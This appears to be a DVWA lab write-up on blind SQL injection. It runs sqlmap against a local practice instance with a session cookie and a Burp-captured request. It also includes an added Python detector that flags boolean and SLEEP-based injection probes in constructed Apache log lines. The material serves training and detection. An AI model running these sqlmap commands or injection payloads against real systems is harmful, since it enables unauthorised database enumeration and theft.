# DVWA Exercises 6

### 13 Blind SQL Injection

In contrast to regular SQL injections, where query results appear directly in the response, a blind SQL injection can usually only be used to obtain **true/false** answers, one per request. Since exfiltrating values this way takes hundreds or even thousands of requests, automated tools are often used. Some people write their own, but most use sqlmap. Fortunately, it has already been installed for you and is ready for use.
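Because the technique needs hundreds of near-identical requests that differ only in the injected condition, it leaves a recognisable trace in web server logs. The following is an added Python example (not code from the DVWA project or from this write-up) that flags such runs in Apache-style access log lines; the log lines, client addresses, response sizes and thresholds are constructed for the demonstration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log lines (not real traffic): one normal visit
# to the DVWA blind SQLi page, then a burst of boolean/time probes from a second client.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1503 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 1503 "-" "sqlmap/1.7"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1%20AND%201%3D2&Submit=Submit HTTP/1.1" 200 1444 "-" "sqlmap/1.7"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1%20AND%20SLEEP%285%29&Submit=Submit HTTP/1.1" 200 1503 "-" "sqlmap/1.7"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)
# Boolean conditions (AND/OR <term> <comparison>) and the time/extraction functions
# blind probes rely on; case-insensitive because SQL keywords are.
BLIND_RE = re.compile(
    r"\b(and|or)\b\s*[\w'\"()]+\s*(=|<|>|like)|\b(sleep|benchmark|substr(ing)?|ascii)\s*\(",
    re.I,
)

def parse_line(line):
    """Return a dict with ip, path, decoded query params, size and ua; None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs already percent-decodes: "1%20AND%201%3D1" becomes "1 AND 1=1"
    rec["params"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec

def find_blind_sqli(log_text, min_probes=2):
    """Group requests by (client, path) and flag groups that look like a blind SQLi run."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            groups[(rec["ip"], rec["path"])].append(rec)
    alerts = []
    for (ip, path), recs in groups.items():
        probes = [r for r in recs if any(BLIND_RE.search(v) for v in r["params"].values())]
        sqlmap_ua = any("sqlmap" in r["ua"].lower() for r in recs)
        # A boolean-blind run yields two response sizes: the "true" page and the "false" page.
        if len(probes) >= min_probes or sqlmap_ua:
            alerts.append({"ip": ip, "path": path, "requests": len(recs), "probes": len(probes),
                           "sqlmap_ua": sqlmap_ua, "distinct_sizes": len({r["size"] for r in probes})})
    return alerts
```

The user-agent check only catches an unmodified sqlmap; the probe count and the two-sizes signal still hold when the agent string is changed.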

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fsd8fV3Cr0eZ3qfVPxCus%2Fblind_sql01.png?alt=media&#x26;token=14a5882b-02ac-4bbb-a8d4-48fbbd468dee" alt=""></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FAWaumAVXtxUGspiA1sHm%2Fblind_sql02.png?alt=media&#x26;token=07edd9b5-f08e-462b-97b7-4280b0598440" alt=""></div>

Let's try sqlmap:

```
sqlmap --cookie='PHPSESSID=<your-session-id>' -u '<your-vulnerable-url>'
```

To find the session id cookie, type `document.cookie` in the browser's developer console:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fb0cTR16VtFhqjrUMHTIx%2Fblind_sql03.png?alt=media&#x26;token=be5c87a6-28a4-4c08-9932-9ce4e5cfd33a" alt=""></div>

First I tried the following parameters:

```
sqlmap -u "http://172.17.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=37dpblqjrhknhc5pi08k916g21; security=low" --data="id=1&Submit=Submit" -p "id" --dbs --level=5 --risk=3
```

I didn't have success with this one. For some reason it said the parameter id is not injectable!

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FRxCFoca5roJukGVOKpFz%2Fblind_sql04.png?alt=media&#x26;token=a95eefb8-c0ad-4a84-848f-052c0afa2533" alt=""></div>

Let's start Burp and catch the GET request that is sent when submitting an ID.

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FsU8aLVpVvZrAm1OTERBW%2Fblind_sql05.png?alt=media&#x26;token=b7530535-489c-4ff7-ba59-59df3c8e5848" alt=""></div>

In Burp I'll modify the GET request, changing the parameter `?id=1` to `?id=1*` (the asterisk marks the injection point for sqlmap), and save the whole request to a file.

```
sqlmap -r blind_sql --threads=10 -f --dbs --tables
```

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FcJ1Rhriw8T726css4Esk%2Fblind_sql06.png?alt=media\&token=f5b0698f-85a8-4f12-8ec6-10ef1c68b6d6)

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F28GdRiYJtPot4pYewJJl%2Fblind_sql07.png?alt=media\&token=4632d941-25a0-49b4-b062-189f24b8d59c)

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FL1e2R8QY6Va72MxIRk3b%2Fblind_sql08.png?alt=media&#x26;token=927339a2-9833-49d9-8d99-7d3ce81ea2ae" alt=""></div>
